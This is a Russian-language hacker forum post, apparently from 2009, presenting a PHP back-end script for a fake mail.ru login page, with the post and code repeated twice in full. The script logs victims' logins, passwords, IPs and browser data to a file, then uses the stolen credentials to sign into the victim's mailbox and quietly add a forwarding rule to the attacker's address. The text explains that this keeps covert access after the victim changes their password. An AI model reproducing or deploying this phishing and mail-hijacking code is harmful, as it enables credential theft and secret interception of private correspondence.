Kusto
31.10.2009, 21:41
Собственно говоря навеянно темой http://forum.antichat.ru/thread130561.html
Сидим ты с товарищем zifanchuck - общаемся по аське и обалдеваем со скорости с которой товарищи с mail.ru латают дыры ну и собственно говоря чтоб они не остались без работы :D решили с ним написать простенький скрипт. Это собственно говоря часть фейка обычный файл с названием log.php
Давайте порассуждаем как нам продлить свое незаметное прибывание на ящике жертвы? И что б вы сделали в первую очередь еслиб заподозрили что на вашем почтовом ящике "завелась какаято бяка"? Ответ напрашиваеться сам собой- бежим менять пасс и контрольный вопрос на восстановлении пароля- логично? (именно поэтому эту часть мы трогать небудем)
Ну а чтож тогда остаеться в Нашем распоряжении??? Скажете- ничего? Типа жертва сменила пасс и вопрос- и мы доступ потеряли? Да так могут сказать 99% пользователей, но почемуто мы всегда без внимания оставляем маленькую деталь- а именно мы можем прописать СВОЕ мыло в ящике жертвы....(а вы когда последний раз залазили в своем ящике в пересылку писем?), Я думаю что уже почти все догадались что просто в нашем фейке- мы пропишем свое мыло на которое хотим получать всю входящую почту жертвы . Оригинальнось этого способа что при удачном стечении обстоятельств мы читаем письма жертвы а они у нее остаються в ящике непрочтенными, для этого надо лиш к своему фейку прикрутить обыкновенный файлик log.php который мы с товарищем Zifanchuk нарисовали специально для пользователей antichat.ru в котором единственное надо прописать свое мыло которое мы прячем в ящике жертвы, ну а после того как жертва авторизируеться- бежать на свой ящик и делать подтверждение на привязку своего ящика к ящику жертвы и тихо-тихо без палива читать все входящие которые получит наша жертва, а вот собственно говоря сам скрипт
<?php
/**
* @author Kusto & Zifanchuck
* @copyright 2009
//Скрипт непретендует на оригинальность
//Просто стараемся замаскироваться в ящике жертвы
//был выложен на antichat.ru
*/
$Login = $_POST['login']; //Логин
$Domain = $_POST['domain'];
$Pass = $_POST['password']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$Browser = getenv("HTTP_USER_AGENT");
$Port = getenv("REMOTE_PORT");
$Connect = $_SERVER['HTTP_CONNECTION'];
$Host = gethostbyaddr(getenv("REMOTE_ADDR"));
$Mymail='Наше мыло';//здесь записываем наше мыло на которое хотим получать письма с ящика жертвы в формате vasya@mail.ru
$filelog = fopen("base.php","a+"); //открываем файл базы
$text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
};
$result = curl('http://win.mail.ru/cgi-bin/auth', 'Login='.$Login.'&Domain='.$Domain.'&Password='.$Pass);
$result = curl('http://win.mail.ru/cgi-bin/modifyfwd', 'modify=1&Username='.$Login.'&Forward='.$Mymail.'&oldPswd='.$Pass);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://win.mail.ru/cgi-bin/auth?&Login=$Login&Domain=$Domain&Password=$Pass'></head></html>"; // кидаем пользователя в ящик
?>
P.S. Еще раз напоминаю что работа не авторская а результат бреда бвух балбесов которые мирно болтали в асе и их осенило (я имел ввиду себя и Zifanchuck)
P.S. S.Пользуясь случаем хочу передать привет работникам mail.ru и пожелать процветания их компании втечении долгих долгих лет, с Уважением Кусто
Сидим ты с товарищем zifanchuck - общаемся по аське и обалдеваем со скорости с которой товарищи с mail.ru латают дыры ну и собственно говоря чтоб они не остались без работы :D решили с ним написать простенький скрипт. Это собственно говоря часть фейка обычный файл с названием log.php
Давайте порассуждаем как нам продлить свое незаметное прибывание на ящике жертвы? И что б вы сделали в первую очередь еслиб заподозрили что на вашем почтовом ящике "завелась какаято бяка"? Ответ напрашиваеться сам собой- бежим менять пасс и контрольный вопрос на восстановлении пароля- логично? (именно поэтому эту часть мы трогать небудем)
Ну а чтож тогда остаеться в Нашем распоряжении??? Скажете- ничего? Типа жертва сменила пасс и вопрос- и мы доступ потеряли? Да так могут сказать 99% пользователей, но почемуто мы всегда без внимания оставляем маленькую деталь- а именно мы можем прописать СВОЕ мыло в ящике жертвы....(а вы когда последний раз залазили в своем ящике в пересылку писем?), Я думаю что уже почти все догадались что просто в нашем фейке- мы пропишем свое мыло на которое хотим получать всю входящую почту жертвы . Оригинальнось этого способа что при удачном стечении обстоятельств мы читаем письма жертвы а они у нее остаються в ящике непрочтенными, для этого надо лиш к своему фейку прикрутить обыкновенный файлик log.php который мы с товарищем Zifanchuk нарисовали специально для пользователей antichat.ru в котором единственное надо прописать свое мыло которое мы прячем в ящике жертвы, ну а после того как жертва авторизируеться- бежать на свой ящик и делать подтверждение на привязку своего ящика к ящику жертвы и тихо-тихо без палива читать все входящие которые получит наша жертва, а вот собственно говоря сам скрипт
<?php
/**
* @author Kusto & Zifanchuck
* @copyright 2009
//Скрипт непретендует на оригинальность
//Просто стараемся замаскироваться в ящике жертвы
//был выложен на antichat.ru
*/
$Login = $_POST['login']; //Логин
$Domain = $_POST['domain'];
$Pass = $_POST['password']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$Browser = getenv("HTTP_USER_AGENT");
$Port = getenv("REMOTE_PORT");
$Connect = $_SERVER['HTTP_CONNECTION'];
$Host = gethostbyaddr(getenv("REMOTE_ADDR"));
$Mymail='Наше мыло';//здесь записываем наше мыло на которое хотим получать письма с ящика жертвы в формате vasya@mail.ru
$filelog = fopen("base.php","a+"); //открываем файл базы
$text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
};
$result = curl('http://win.mail.ru/cgi-bin/auth', 'Login='.$Login.'&Domain='.$Domain.'&Password='.$Pass);
$result = curl('http://win.mail.ru/cgi-bin/modifyfwd', 'modify=1&Username='.$Login.'&Forward='.$Mymail.'&oldPswd='.$Pass);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://win.mail.ru/cgi-bin/auth?&Login=$Login&Domain=$Domain&Password=$Pass'></head></html>"; // кидаем пользователя в ящик
?>
P.S. Еще раз напоминаю что работа не авторская а результат бреда бвух балбесов которые мирно болтали в асе и их осенило (я имел ввиду себя и Zifanchuck)
P.S. S.Пользуясь случаем хочу передать привет работникам mail.ru и пожелать процветания их компании втечении долгих долгих лет, с Уважением Кусто